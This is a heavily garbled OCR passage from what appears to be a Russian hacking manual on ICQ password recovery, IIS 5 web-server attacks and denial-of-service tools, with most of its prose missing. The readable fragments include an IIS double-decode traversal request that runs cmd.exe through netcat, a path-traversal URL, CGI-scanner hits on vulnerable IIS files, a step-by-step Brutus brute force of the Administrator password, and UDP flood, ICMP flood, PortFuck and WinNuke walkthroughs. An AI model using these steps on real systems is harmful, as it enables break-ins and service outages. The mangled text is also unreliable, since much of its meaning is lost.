> ICQ, Advanced ICQ Password Recovery (

ICQ) .dat, ICQ.
, ,
ICQ 2002 2002. 2002 , UIN .dat, .., ,
207685174.dat (207685174 - UIN ). ICQ Password successfully found! ( ICQ ), (. 11.11).
. 11.11 ,
ICQ 99 - 2000,
ICQ 2002 ( ).
ICQ Password successfully found I

ICQ version:
99b-2000b
UIN password:
Copy to Clipboard
Close
, . .. !
ICQ
, - , - ICQ-. (. 6), , (. 9), Web- (. 8).
, ,
, .

, ICQ
( ) , . , ,
,
ICQ. , ,
ICQ - ,
- . , .
ICQ,
.
. , , ICQ- - ICQ . ,
178
ICQ , UIN . -

?
, , , - ,
. , , - , , , ,
, , - . ICQ - , , ,
,
, , , , .
- , ..
ICQ, , , . , ICQ
ICQ, ICQ ( , ICQ Team
(http://www.lcqteam.com)). ICQ- ICQ, ICQ- - ICQ.

- , .
, ? ,
, . ,
- , ? , ... ,
, , .
ICQ-, -

,
.
ICQ ,
. ICQ -
, -
11. ICQ
179
ICQ-. ICQ
DoS ...
.
ICQ
. -, ,
ICQ-, ICQ-, ICQ- .
ICQ,

ICQ. IP- , ,
ICQ. ICQ .
, ICQ-, UIN
. , ICQ-, -, , BlacklCE Defender,
DoS. -
, , .
,
. ,
ICQ -

.
-, -
ICQ, ICQ. , IP- ICQ-,
- . ,
.
, . ICQ , PGP Desktop Security 2.9,
ICQ-
. ,

PGP- ( [7]).
4.
XakiiH2 W/eb
Web , Web
. ,
- , , .
Web , , , , .
, , , , , Web , ,
Web - ,
. Web - , . , Web

, .
Web,
, . 12 , ,
Web,
Web-. Web
, . ,
, DoS -
, Web- - - .
13 DoS
.
12.
XakuH2 W/eb-caumoB
Web? , Web
,
. Web-
, Web- .
, , , .
, Web-
, ,
, , .
HTML Web-
( - ),
, . HTML
.

(
).
, Web-, , Web-,
, . HTTP, , , .
Web-,
, .
, Web-, DoS
,
, Yahoo.
,
Web-, , ( ) Web- ,
. Web , .
Web-
Web
Web , , Web, Web,
182

, .
Web - Web, Web . Web - , Web, Web . Web

, .
Web - Web,
, Internet Explorer (), -
HTML Web-, HTTP,
Web ( ).
Web , IIS Microsoft, Apache HTTP Server Apache Software Foundation
. Web,
ASP (Active Server Page - ) CGI,
, Java SUN,
Apache Software Foundation . ( CGI, CGI- Web-.)
Web, Web,
, . SQL Microsoft, Oracle Oracle .
, , , -
ODBC (Open Data Base Connectivity -
).
- , , , , , ... ?
xakimza Web-
,
Web-,
. ,
.
12. Web-
183
Web- - ,
, , , , Web .
Web- - Web- ,
, TCP- 80, , Web-,
( CVE, Web-), Web- - .
Web - - ASP, Java, CGI -
, .
Web - , -,
, -, ( !).
, , - . , , (cookie),
, .
- Web-
, , . , , CGI- , -
CGI- , , , .
- ,
Web- ; .
- , Web-
,
, -
.
- , , ,
Web-, Web-, .
, (, . [11]).
, , , , IIS 5. ,
(
184
HTTP), CGI- (
) Web ( Web).

Web- , .
IIS , Web-,
. , Web- ,
- , .
- , Web-. - . , FTP- , , .
, .
Web- .
Web-
,
Web-,
. , , ,
, . , , .
, Web- , IP- , , DNS-,
.
Web.
,
.

Web-
.
.
12. Web-
185
-, ,
-- ,
. IP-, , ,
.
.
-, HTML- Web- . HTML , Web, , .
, , , , JavaScript . , HTML- Web
Web- Teleport Pro.
, , Whols - , ,
Web.
whois (
Unix), Web- , whois Web-.

. , ,
. 1999
- Network Solution (http://www.networksolution.com),
, , InterNic (http://www.internic.net). / .
Web-,
Whois ( ),
. Whois
, ,
, DNS
. ,
RIPE NCC (Network Coordinate Center - ),
-
. Web- RIPE NCC (http://www.ripe.net),
. 12.1.
186
? - IP-
DNS - .
Query the Ripe Whois Database
. 12.1. Web- RIPE NCC

IP- Web-

,
SuperScan (http://www.foundstone.com),
. 12.2.
[1.0.0.1
Resolved
] I Me I |lntei(a<
5lart|1.0.0.1
Slop|l. 0.0.5
Timeout
Pina
IJLILI |
Connect
[2000
0 Ignore IP
0 Ignore IP 255
E>*acl from He
Read
14000 I
Scan type
Resolve hostnames
E3 Only scan responsive pings
0 Show host lesponses
G Ping only
G Evefy port in list
G AH selected ports in list
lisl ports from [T|
AH ports from
peed
Max
'
21 File Transfer Protocol [Control]

25 Simple Mail Transfer
WINS Host Name Saver
53 Domain Name Server
60 WotldWideWebHTTP
HTTP/1.1 401 Access Denied .Server Mictosoll-IIS/5 U.Date: Thu.
68 Kerberos
106 3CDM-TSMUX
Puc. 12.2.

\
12. Web-
187
SuperScan, .
> Start () IP- .
> Stop () .
> Scan type ( )
All list ports from ( ).
> Start ().
SuperScan . , IP- 1.0.0.1 HTTP IIS 5.0, - Web. (
),
.

Legion
(http://packetstormsecurity.org/groups/rhino9),
IP- 1.0.0.1 . 12.3.
Jean
1 Scan Range
AbMtSeM
Scan List
lea
| Add | j |
Impel list
6 share s found on 1 remote hosts.
RTPP EH
V\1 .0.0.1 Wy Documents

\\1.uai\NETLOGDN
B-j | 1.0.0.1
My Documents
-- NETLOGON
w .0.0.140
\\1.0.0.1\T<*I
\4.au1\My Downloads
\\1.0.0.14SYSVOL
D
-~ Test
isa My Downloads
CT SYSVOL
'
'
Map Drive |
Save Text
. 12.3. IIS 5
, IP- IIS 5,
- , ? .
IIS 5
IIS ,
HTTP (Hypertext Transfer Protocol - -
188
) CGI (Common Gateway Interface - ), IIS, .

HTTP , - Web . HTTP , GET. Web- (, ), GET, , ,
http://www.anyserver.com/documents/order.html.
order.html /documents IIS,
c:\inetpub\wwwroot\documents.
CGI , . HTTP, :
http://www.anysite.com/scripts/MyScript7napaMeTp1 +2
MyScript - , /scripts IIS,
?+2 , MyScript. IIS ,
,
,
.
CGI, ASP
(Active Server Pages - ) ISAPI (Internet Server
Programming Interface - ). ASP :
http://www.anysite.com/scripts/MyScripts7napaMeTp1 =1&2=
2
MyScript.asp, , , HTML. ISAPI
, ISAPI. HTTP:
http://www.anysfte.com^sapi.dll?nepeM*HHm1&riepeMeHHafl2
, IIS, , .
HTTP
HTTP ,
IIS . IIS 2.0 :
12. Web-
189
http://www.anysite.com/../../../../../winnt/secret.file
Web- , secret.txt.
- Windows, ACL.
IIS , Web-
[3]. IIS
, , , , ,
SecurityLab.ru (http://www.securitylab.ru).
IIS,
netcat (http://www.atstake.com), 9
(netcat - -
[3] netcat IIS).
netcat Sword-2000
, . netcat .
>
Alex- netcat,
nc -vv 1.0.0.1 80
>
GET / HTTP/ 1.0 iP^l. . 12.4.
Command Prompt
C:4test\netcat>ne -uu 1.0.0.1 80

DNS fud/rew mismatch: SUORD-2QQO != suopd-2000.suord.net
SWORD-2000 [1...1] 80 <http> open
GET / HTTP /1.0
HTTP/1.1 400 Bad Request
Server: Microsoft-IIS/5.0
Date: Fri, 28 Feb 2003 12:55:40 GMT
Content-Type: text/html
Content-Length: 87
<htnl><head><title>Error</titleX/head><bodj(>The parameter
</htnl>sent 17. rcud 224: NOTSOCK
C:4test\netcat>
Puc. 12.4. GET IIS netcat

GET / HTTP/1.0
IIS. . 12.4, HTML, .
, GET <.
GET.txt :
190
GET/HTTP:/1.0
[CRLF]
[CRLF]
[CRLF] . netcat .
nc -vv 1.0.0.1 80 < get.txt

get.txt, . 12.4.
( .)
, . ddcode.txt .
GET /scripts/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ HTTP /1.0
[CRLF]
[CRLF]
1-1 Windows
2000 ( ).
netcat :
nc -vv 1.0.0.7 80 < ddcode.txt
. 12.5.
Command Prompt
|: N t e s t N n e t c a O n c -vv 1 . 8 . . 7 88 < adco<
(DNS f ud/>eu ni snatch: ALEX-1 *= ft LEX-1 ,s..
I ALEX-1 [ l . e . 8 . 7 1 88 C h t t p ) open
[HTTP/LI 288 OK
Sepvex: M i c r o s o f t-I IS/5 .
.Date: Sat, 81 2883 67:16:42 GUT
Icontent-Type: a p p l i c a t i o n / o c t e t - s t r e a
186
122
113
186
16
17
128
186
12.2882
12.2882
81.2883
81.2803
81.2883
82.2883
81.2883
82.2883
i t s and Setti
Inetpub
.
netcat
Ppogra
MINNT
. 12.5. 1-1 !
, 1-1
! Sword-2000 ( Windows 2000 Advanced
Server Service Pack 2) - Microsoft , 2000
. ,
URL ,
12. Web-
191
(. [3], [4], [11]).

, . Windows 2000 ?
- ,
? ,
.

Web-, IIS, -
, Web-.
, Web- CGI (Common Gateway Interface - ), , Web .
CGI, , .
Web-,
.., IIS, System, . .
, CGI- ;
, . , -
, ,
, . ,
-
.
, , Perl, , ., , , ,
, , , . , - , , Web, - . , , CGI-, , Web-,

.
192
CGI-
D@MNED CGI Scanner 2.1 (http://shieldandsword.narod.ru/soft/scansec/scansec.htm). . 12.6 ,
.
* D@MNED CGI Scanner 2.1 (177 exploits)
S
Scanner lo^jl Scan list|| CGI holes]! PV ||0ptins|| About... |
t>
READY
. 12.6. CGI- D@MNED CGI Scanner2.1

, D@MNED CGI Scanner 2.1.
Scanners log ( )
. , , , .
Scan list ( ), . 12.7, , .
,
, .
. , ,
.
, .
Scan subnet ( ) IP-, . , : 234.56.78.1 - 8.
12. Web-
193
I Scanner log j[,gc;'ari:ljst || CGI holes|[ Spy |[ Options || About
a 9 If""'
"Jo
_)Vt/users,pwd
rout
'
jdsa*nplBS/c0nfig/site,csc
I/Ad vWorks/equiprnemt/catalog_ty[>B. asp
/ASP3amp/AdvWorks/aquipmen!/cata!og_type.asp .
. 12.8.
CGI-
Puc. 12.7.

CGI holes ( CGI) (. 12.8) CGI-,

.
, ,
,
Scan list ( ).
Spy () (. 12.9),
Web- ( - IIS 5.0),
( ).
$ D@MNED CGI Scanner 2.1 (177 exploits)
Scanner log || Scan list [I CGI holes || Spy
j| Options || About..
Server: Microsoft-HS/S.O
/.1 200 OK
Server; Miqrosoft-IIS/'SiO
Date: Thu, Q6 Feb 2003 10:44:12 GMT
Connection: Keep-Alive
Content-length: (1296
Content-Type: text/html
et-Cookie: ASPSESSIOrJIDGQGGQTFU=HCFBCMBBGPKEJBUCFOEDBCA! path=/
Cache-control: private
READY
Puc. 12.9. CCI- !

Option (), . 12.10,
-, . - -
- -,
- ( , ...).
7-1687
194
D@MNED CGI Scanner 2.1 (177 exploits)

Scanner log]| Scan iist|[CGl holes|| Spy ][ option's|| About... |
Use proxy
gi-bin/
i
iguage
Dofiniee
English
Puc. 12.10. CGI-

D@MNED CGI Scanner 2.1 .
1-1
IP- 1.0.0.7, .
> Scan list ( )
http://www.altavista.com IP- 1.0.0.7.
> Scanner log ( ) . ,
. 12.11.
'if D@MNED CGI Scanner 2.1 (177 exploits)
Scanner Jog||Scan list || CGI holes11 Spy || Options]) About...
\> D
rf.htr-500
1.0.0.7/_vti_pvt/shtml.ex9 - 4G3
1.0,Q.7/_vti_pvt/users,pwd - 4D3
1.0.Q.7/i!Sadmpwd/anot3^htr -500
1.0.0,7/nshelp/iis/mtsc/iirturnh.htw - [ 200 SUCCESS ]
1.0.Q.7/iissarripl9s/ax3ir/s8arch/qfulihit.htw - [ 200 SUCCESS ]
1..Q,Q,7/iis5amp!as/axair/S8arch/qsumrhit.htw - [ 200 SUCCESS ]
1.0,0,7/iissampies/exair/SearclVquery.idq - [ 200 SUCCESS J
1.0,D,7/BSsampies/exair/Search/saarch.idq - t 200 SUCCESS ]
l.D.O.y/iissamples/issamples/fastq.idq - [ 200 SUCCESS 1
l,0.0.7/iisSarnples/is$ampl9Voop/qfullhit.htw - [ JOQ SUCCESS']
1.0,0.7/iis5arnp!es/issamplBS/ODp/qsumrhit.htw - [ 200 SUCCESS
1.0.0.7/iissamples/issamples/querv.idq - [ 200 SUCCESS ]
I.0,0.7/iis5amples/sdk/asp/docs/co<iebrws.asp - t 200 SUCCE
1.0.0.7/msadc/msadcs.dll - [ 200 SUCCESS )
1.0.0.7/scriptsAisadmin/bdir.htr7dir=ht??c:\ - SOQ
1.0.0.7/scripts/iisadmin/ism.dll7http/dir - 500
READY
Puc. 12.11. IIS 5.0

( . 12.11 200 500) ; . , 200 - ,
500 - . 200 (
- SUCCESS)
.
12. Web-
195
, D@MNED CGI Scanner 2.1

. , ,
. ,
1, , MITRE CVE
(http://www.mitre.org). , . 12.11, IIS .htr .idq.; MITRE.
CVE-2001-0500
Buffer overflow in IS API extension (idq.dll) in Index Server 2.0 and Indexing Service 2000 in IIS 6.0 beta and earlier allows remote attackers to execute arbitrary
commands via a long argument to Internet Data Administration (.Ida) and
Internet Data Query (.idq) files such as default.ida, as commonly exploited by
Code Red.
( ISAPI (idq.dll) Index Server 2.0 Indexing Service 2000 IIS 6.0 -
.Ida (Internet Data Administration -
) .idq (Internet Data Query - ),
, default.ida, Code Red.)
Reference: BUGTRAQ:20010618 All versions of Microsoft Internet Information
Services, Remote buffer overflow (SYSTEM Level Access)
Reference: MS:MS01-033
Reference: CERT:CA-2001-13
Reference: BID:2880
Reference: XF:iis-isapi-idq-bo(6705)
Reference: CIAC:L-098
, CGI- IIS
- IIS. , ,
http://www.securityiab.ru. ,
, .
" IIS .htr
, Web . "" , .htr (ISM.DLL).
IIS 4.0 5.0 SP2 1 2002.
IIS - , ,
196
. ISAPI , .htr , ISM.DLL.

ISM.DLL . IWAM_COMPUTERNAME.
. HS 4.0-5.1."
, SecurityLab.ru Unix Pylon, . ,
, ( ,
).
CGI Vulnerability Scan (http://www.wangproducts.co.uk),
. 12.13.
aglimpse
AnyForm2
args.bat
args.cmd
AT-admin
Auth
bnbform.cgi
bsguest.cgi
bslist.cgi
calender.pl
campas
carbo.dll
CGI Counter
CGImail.exe
cgiwrap
classifieds.cgi
Deselect All
Scan All
Scan Selected Stop Scanning Proxy Setup
-ActMty Log-
5
a Save Results
f Clear Log
die...
Puc. 12.12. CGI Vulnerability Scan

CGI-, ,
- .
,
,
SecurityLab.ru
(http://www.securitylab.ru), IIS ( ),
IIS.
, , HTTP - . -

12. Web-
197
Web-? - HTML- Web-, . HTML,

Web, HTML .
Web . , , Teleport Pro (http://www.tenmax.com),
Web .
Teleport Pro.
lA/eb-crtaugep Teleport Pro

Teleport Pro Web-, Web- . Teleport Pro , ( ), , Web Web-.
, ,
- spider - .
Web-
Web - . , , , . Teleport Pro .
Web-
.
Web-, ' .
Web- .
Web-.
Web-, Web-.
Web- .
Web-.
Teleport Pro , Web ,
.
198
Teleport Pro , , Web.

, , Web.
Start () - , Teleport Pro ,
Web, Web-, , .

Web
. , Teleport Pro Web
, .
Web- , Web, .
Teleport Pro . 12.13.
Unwind - Teleport Pro
File
Project
View
Help
Puc. 12.13, Teleport Pro

Windows
Teleport Pro
,
.
npoekma
.
> Teleport Pro File New Project Wizard
( * ). (. 12.14).
12. Web-
199
Welcome to the New Project Wizard!

The New Project Wizard makes it easy for you to setup end
run aTeleport Pro project.
What do you wantTeleport Pro to do?
</ Create a browsable copy of a website on my hard drive
Duplicate awebsite, including directory structure
Search a website for files of a certain type
Explore every site linked from a central site
Retrieve one or more files at known addresses
Search a website for keywords
< Back
. 12.14.
Teleport Pro
. 12.14
Teleport Pro.
Create a browsable copy of website on my hard drive - Web- .
Duplicate a website, including directory structure - Web-,
.
Search a website for files of certain type - Web- .
Explore every site linked from a central site - ,
.
Retrieve one or more files at known addresses -
.
Search a website for keyword - Web- .
> -
Web- . ,
Next ().
(. 12.15).
> Web;
, New Address ( )
.
200
Starting Address
Enter an Internet address to serve as the starling location for
this project Examples of valid Internet addresses ere
"www,microsoft.com", "www.netscape.com/products/", and
"www. ibm.com/home/index htm".
How deeply would you likeTeleportto explore?

Up to
[3
~ links from this starting point
(If you want to add more starting addresses to your project

later, use the "New Address" menu command, or press the
"New Address" button on the toolbar.)
. 12.15.
Web
Up to ... links from this starting point ( ...
) Web , ( 3).
Next ()
(. 12.16).
New Project Wizard - Step 3 of 4
Project Configuration
When creating the local website, retrieve:
Just text
Text end graphics
Text, graphics, and sound
Everything
If you need an account and password to access this site, enter

them here:
iunt:
Password:
< Back
Next >
Cancel
Puc. 12.16.
> . 12.16 , Web
. :
Just text ( ) - .
Text and graphics ( ) -
.
12. Web-
201
Text, graphics, and sound (, ) , .

Everything () - .
> , , Account ( ) , Password
() - .
> Next ()
(. 12.17).
New Project Wizard - Step 4 of 4
Congratulations!
You've just created a Teleport Pro project!
When you press Finish, you will be asked to save the project.
Choose e name for it in the Save dialog box
Teleport Pro will save the project then create a folder, named
after your project in which it will store any retreived files.
When you're ready to run the project press the Start ( ) 1
button on the toolbar, or select Start from the Project menu.
Cancel
Puc. 12.17. !
. 12.17 , Start ()
Start () Project ().
> Finish () (. 12.18) .
Save in: | Ql Teleport results
E> e* I
-J yahoo
Iklingonj
Sove as type:
[Teleporl Pro Project (*.tpp)
Puc. 12.18.
Teleport Pro
202
,
. , ,
Teleport Pro 1.29.1959 HTTP FTP.
Hacmpouka cBoucmB npoekma

Project
Properties ( ), . 12.19
Project Project Properties ( * ).
[Summary | Fila Retrieval | Browsing/Mirroring | Exploration | Exclusions | Nsliquelle [ Advanced |
El Always save HTML pages
Replicate the directory structure of remote servers

Use MSIE-compotible filenames (appends .htm to HTML files where necessary)
r-L
Localize links for retrieved files
r- Links forunretrieved
& LJnkto emessa je that explains why the file was not retrieved
Link to the Internet address for the file
Link to a place vvhers the local file will be stored
3 Link using 8. 3fileno mes
Relink oil files in the project folder now
Cancel
Apply
Puc. 12.19.

Project Properties ( ) , . , Browsing/Mirroring (/
), . 12.19.
Browsing/Mirroring (/ )
,
, ,
,
. .
Always save HTML pages ( HTML) Teleport Pro HTML, .. Web-,
, ,
12. Web-
203
Web, . , Web-
, ,
Web- .htm .html.
Replicate the directory structure of remote servers (
) , .
,
, .
Use MSIE-compatible filenames (append .htm to HTML files where
necessary) ( , 8 (
.htm HTML)) IE ,
HTML, .htm .html (, .shtml .pi). ,
, Teleport Pro
HTML, .htm .html,
.
Linkage System ( ) , , ,
. Localize links for all retrieved files
( ) ,
, Web.
:
Link to a message that explains why the file was not retrieved -
, , . , ,
, .
Link to the Internet address for the file - .
,
.
Link to a place where the local file will be stored - ,
, ..
Web .
Web- , .
204
.
Teleport Pro
HTML- , , , ,
Java, . , -
.
Linkage System (
) Link using 8.3 filenames (, 8.3) , DOS . , ,
8.3.
Relink all files in the project now ( )
HTML
, .
koga HTML
, , , Web-. HTML
Web-? , Web- , ,
Web-. , Web, HTML.
?
-, - ,
. , , , - ,
. , - .
-, - , , - , , . ,
, CGI, , , Web-. HTML
CGI-,
.
, .
, . , - .
12. Web-
205
, ,
, , Web , ,
Retina (http://www.eeye.com/html/Products/Retina/). ,
Teleport Pro (http://www.tenmax.com) HTML-
, Web.
k cmpammkaM Web
, Web ? ,
Web, ,
- . HTML, HTTP.
, , .
Web-,
.
- ,
Web- ,
/ Administrator/password
( , , [3] , (!!!)
Web).
, , Brutus Authentication Engine Test 2 ( 2), Brutus AET2 (http://www.hobie.net/brutus), 10, .
, HTTP.
. 12.20 Brutus.
IIS
Sword-2000, .
> Target () IP- , 1.0.0.1.
> ()
, . HTTP (Basic
Authentication) (HTTP ( )) -
HTTP, ( IIS
Windows IIS).
206
X Brutus - AET2 - www.hoobie.nel/biutus (January 2000]

File
Tooli
Target
1st 3
Help
|1. 0.0.1
Type |HTTP(BasicAulh) H | Start
Stop | Clear |
Port [
I
Connections 10 Timeout ^^ 10
'
'
[] Use Proxy | Define |
. .,.,. , . , .
Method
(HEAD
171 Use Username

UserlD
KeepAfive
Single User
(Administrator
Pass Mode | Brute Force | ] | l;.^nge'| | Dr>*iifcal |

| |Brow$e|
PassFite
| | Bows |

Target
1.0.0.1/
I Type
HTTP (Basic Auth)
| Username
Administrator
I Password
007
1 Tmcui Rwe. AuhS., Ttote (Mck M

991
|[UAdminislrator :
||65 Attempts per second
||ldle
Puc. 12.20. Web-

Authentication Options ( ) , . Administrator,
Use Username ( ),
Single User ( ).
> Pass Mode ( ) Brute
Force ( ), , .. .
> Range (). Brutus - Brute Force Generation (Brutus - ), . 12.21.
Urutus - Brute Force Generation
Digits only
Min Length
|0
iLowercpse Alplio;
Max Length \S
[> |
Uppercase Alphe
Mixed Alpha
Alphanumeric
Full Keyspoce
Custom Range
|etaoinsrhldcumfpgwybvkxjqz12345678901
Puc. 12.21.
Brutus - Brute Force Generation (Brutus -
) - ,
IIS .
12. Web-
207
; Min Length ( ), Max Length ( ) - 3. ,

Digits only ( ).
.
> Start () Brutus - 2 (. 12.20) . Brutus - 2 . 12.22.
Brutus - 2 - www.hoDbie.nel/biutus - (January 2000)
File
Tools
Help
Target |1.0.0.1
Type | HTTP (Basic Authj [ | Start | Stop | Clear]
pConnection Options10
Connections
Poit
10
Timeout
Q Use Proxy | Define |
-HTTP (Basic) OptionsMethod I HEAD
KeepAlive
-Authentication Options
0 Use Username
UserlD
0 Single User
(Administrator

Password
007
I Type
I Username
HTTP (Basic Auth)
Administrator
Target
1.0.0.1/
Positive authentication all. 0.0.1/ with User : Administrator Password 007 (992 attempts)
Disengaged target 1.0.0.1 elapsed time : 0:00:17 attempts : 992
RM
992
]|UAdministrator P:000
AuthSeq
* Quick Ml
||ldle
]|58 Attempts per second
Puc. 12.22. IIS !

, IIS , . 12.23, ,
.
1.0.0.1
User name:
Password;,
61
Remember my password
OK
||
Cancel
Puc. 12.23.
Web
208
, Brutus , Web. CGI- Web-. () HTTP

(Form) (HTTP ()) GET ,
, ,
, .
Web, , - . Web
, . , , . , Windows NT/95/98,
Web- CGI Vulnerability
Scan D@MNED CGI Scanner 2.1, ,
, Web, ,
.
, Web-, , ,
. Web - ,
Web- .
, Web- - , Retina, , , [7]. Web- -
,
.
13.
Amaku DoS
, TCP/IP, TCP/IP , . , , - ,

DoS (Denial of Service ). DoS -, TCP/IP .
DoS , . DoS ,
, Yahoo, eBay, CNN.com, www.Microsoft.com,
, [3].
, , , , .
DoS ,
,
, , .
, [3], DoS
,
. ., , , , DoS Web-; , DoS
. ,
, - , DoS.
DoS,
, .
210
.
6 , DoS
,
.
DoS , ,
, , - -
IDS
(,
BlacklCE Defender
(http://blackice.iss.net/)), .
amak DoS
DoS ,
.
, , DoS .
- ,
, , ( Web- Yahoo).
. , , 1 ( 1544 /), , , 56 / ( ).
- ,
, , .

.
- ,
.
- , ,
.
- , .
,
.
13. DoS
211
- ,

, .
.
DoS , , .
Amaku
,
. 1, Web- [3],
, .
, , .
, . , - UDP ICMP.
DoS, , ,
/.

.
UDP
, UDP
UDP, . , DoS, UDP Flooder 2.0
Foundstone (http://www.foundstone.com), , - , .
. 13.1 UDP Flooder 2.0.
212
UDP Flooder 2 00
IP/hostname
IP: 1.0.0.1
1.0.0.5
Max duration (sees)

Speed (pkts/sec)
| 250 |
0 Random
'
[[infinite] |
Port |80
t l
Max packets [[Infinite] |
max .
p-j
min
,
~"V
Modem > Cable > Tl > LAN
[20000 | to
[30000 | bytes
Text
From file
Browse 1 1
Pockets sent
903
Seconds elapsed
20.299
|
|
Go
Stop
Puc. 13.1. UDP

UDP Flooder 2.0,
DoS 1-3
IP- 1.0.0.5 .
> UDP Flooder 2.0.
> IP/hostname (IP/ ) IP- NetBIOS - IP- 1.0.0.5.
> Port () , 80, HTTP-.
> Speed () LAN, .
> Data ()
Random ( ), .
> , , 20 000 30 000, .
Go ().
> , , Stop
().
. 13.2 Alex-
, Networking ().
13. DoS
213
i Windows Task Manager

File
Optioni
View
Help
Applications"] Processes | Performance | NetwJîng |

Sword
Adapter Name
Sword
I Network Utilization I
Link Speed!
lOMbps
Operatic
JLJ
Processes: 33
||CPU Usage: 2V.
^Commit Charge: 150620K / J7864 j
Puc. 13.2. - 80%

, -
UDP, 50%
. - ,
LAN Ethernet lOBase.
ICMP
( ) ICMP (Internet Control Message Protocol -
) ICQ,
11 ( UDP).
. 13.3 X-Script ICMP Bomber.
vO 3 By Code
Host 1.0.0.5
Packet Size: h 00000
] Number To Send: hooO
Received 34464 bytes from 1.0.0.5 in 60 msecs

Puc. 13.3. X-Script ICMP Bomber ,
214
, Host
() IP- ,
Ping (). , Packet Size ( )
, Number to Send ( ) .
-
. . 13.4 ,
Alex- ( IP-
, , 1.0.0.5).
File
Options
View
Help
Applications [ Processes | Performance | Networking j

Sword -
Adapter Name
Sword
Processes: 33
I Network Utilization I
CPU Usage: 52
Link Speed |
10 Mbps
Operatic
||Commil Charge: 141720K / 47864 ^
Puc. 13.4. DoS !

ICMP' , ICMP (Internet Control Message Protocol - ) TCP/IP, ICMP
. ICMP
,
Web-; ICMP .
Amaka Smurf
, , ,
DoS ? Smurf, .
13. DoS
215
, , Smurf
. ECHO () ICMP,
. IP- ,
. , , -
10 , .
, DoS, DDoS (Distributed DoS). DDoS -, .
, ,
DoS . DDoS WinTrinoo (
http://www.bindview.com), , , DDoS Win32. 2000 DDoS
, Web- (, , , WinTrinoo).
- Foundstone , ,
DoS.
Amaku
DoS, , , , , . , , DoS,

,
. , .
DoS
PortFuck, ( TCP- , ). PortFuck - TCP- , . ,
,
216
, TCP- ,
, , .
. 13.5 PortFuck.
X
:.; PortFuck 1.02 PRIVATE BUILD

Host: localhost
1
Port:
START
HALT
|D Disconn icton Connect
| "~
| Reconne ct on Disconnect
| |_
Help?
L_
PANIC!
l|_
Delay (MS) [loop

[Ready.
Socks: |0
1
1
l|
Puc. 13.5. PortFuck

PortFuck DoS, .
> Host () IP- (
1.0.0.5).
> Port () 80 - HTTP.
> Disconnect on Connect ( )
Reconnect on Disconnect ( ),
/ Alex- ( -
1.0.0.5).
> PANIC! () , , ..
.
> START () .
> , , HALT
().
. 13.6 PortFuck
Alex-, Windows XP Pentium- 400 .
, - 80-90% ,
, Windows Alex-
. ,
. 13.7 PortFuck
80 Alex-, Attacker 3.0
Foundstone (http://www.foundstone.com).
217
13. DoS
Windows Task Manager
File Option: View
Help
Applications] Processes | Performance [Networking]

'CPU Usage -
CPU Usage History-
-PF Usage
Page File Usage History
Totals
Handles
Threads
Processes
7319
412
37
Commit Charge (K)Total

Limit
Peak
Processes: 37
155448
478648
156872
||CPU Usage: 84%
^Physical Memory (K)

Total
Available
System Cache
Kernel Memory (K)
Total
Paged
[ Nonpaged
196088
45864
73764
24388
20468
3920
||Commil Charge: 15448 / 47861
Pttc. 13.6. Alex-3 !

? Attacker 3.0: Listening on inteiface 1.0.0.5
Slop
jjoitsr
Cop
Program started: Feb 13 2003 10:28:13

Feb132003 10:28:13
TCP connect from 1.0.0.1
Feb132003 10:28:26
Feb132003 10:28:26
Feb132003 10:28:26
Feb132003 10:28:26
Feb132003 10:28:26
Feb 13 2003 10:28:26
Feb132003 10:28:26
TCP conned from 1.0.0.1
Febl 32003 1028:26
poit 1573 to port 80

pof 11574 to port 80
port 157510 port 80
port 1576 to port 80
port 1717lo port 80
prat 1734 to port 80
CJeai
About
Puc. 13.7. Alex-3 - 80

, HTTP-, 1-3,
, . ...
218
Amaku HekoppekmHbiMU nakema/wu

, .. ,
, ..
. , .
, -
. .
Amaku Nuke
^ Nuke ,
DoS, , , -, .
- , . TCP/IP
ICMP, ICMP .
- -
, .. - ICMP, , ,
. ,
.
- - ,
, , ,
. LRC
Web-, , . Nuke -
IRC.
DoS Nuke , ,
Windows 2000/XP ,
Windows 9x.
Windows 2000/XP,
(, [4]). ,
Windows ,
, .
,

.
Nuke - , . ,
Windows Nuke'eM version 1.1, . 13.8.
13. DoS
219
'Windows Nuke'eM - Version 1.1

File
Help
Address
h.00.7
1-0.0.4
1.0.0.5
1.0.0.7
lext Testing 1 2 3
Delay
f-^J Close after execution
This program is created by Sadikuz (c) lor

test-purposes only. The author ot this
program
is not responsible for any misbehaviour by
Execute
Done
Pitc. 13.8.
Nuke , - 1-2, IP- 1.0.0.4
Windows 95. .
> Address () Windows Nuke'eM version 1.1,
. 13.8, IP- Alex-2 (Windows 95), Alex-3 (Windows XP) Alex-1 (Windows 2000).
IP- Add () .
> Execute (). Windows Nuke'eM version 1.1
(. 13.9).
Windows Nuke'eM - Version 1.1
File
Help
Address
Eort
h.0.0.7
1.00.1 {Nuked}
1.0.0.S {Connect error}
1.0.0.7 {Connect error}
lext [Testing 1 2 3
Qelay
LlJ D Close after execution
This program is created by Sadikuz (c) for

test-purposes only. The author of this
program
is not responsible for any misbehaviour by
Execute
Unable to connect to: 1.0.0.7
Puc. 13.9. Alex-2 !

> 1-2, 1-2 Windows.
Windows , . 13.10.
220
File
Edit View Favorites
Tools
Help
*Bacfc -- 53 | !tSearch |giFolderll Q>History 4t X tf>

My Documents
Folders
i Q Web-prog<
tf^ \\Alex-2 is not accessible.
SI @l My Computer
My Network F
The network path was not found.
Entire Neti
icroso
OK
All
f-S Alex-2
-S Alex-3
Sword-2000
ft-<ai
1
0 object(s)
]|41,7
|| My Computer
Puc. 13.10. , Alex-2 !

, 1-2 - Nuke. ,
- IP-.
Windows , , , IDS ( BlacklCE Defender).
Amaku Teardrop
, ,
Teardrop, Windows, Windows
NT 4 . Teardrop . , , ,
.
,
-
, . , , ( ), .
Windows /NT,
Windows 2000/XP.
Amaka Ping of Death

Ping of Death ( ) -
ICMP ( 1 -
13. DoS
221
),
ICMP, .. 64 .
, , ,
Windows , OS UNIX.
Amaku Land
Land , TCP- , - (, - ). TCP-
, , , , ..
TCP- . ,
IP- ,
. ,
, ,
TCP-.
, Land (, - Land), - Land
- Windows, Unix, MAC OS,
CISCO, 3COM.
Land, .
Amaku nakemaMu
- Nuke , - Nuke

. DoS
,
ICMP. .
- ICMP- Redirect (), , ,
.
17 .
- ICMP- Address
Mask Reply ( ),
, .
222
TCP- -
Nuke, , ICMP- Destination
Unreachable ( ), .
- ICMP- Source Quench ( ), . , ICMP- Destination Unreachable:
Datagram Too Big ( : ).
, ICMP DoS , , , , ,
,
.
, , DoS,
TCP/IP - NetBIOS Sir Dystic, nbname, NBNS IP-
NetBIOS Windows 2000 [4]. nbname, , NetBIOS NetBIOS. TCP/IP - , , , , net send.
, nbname
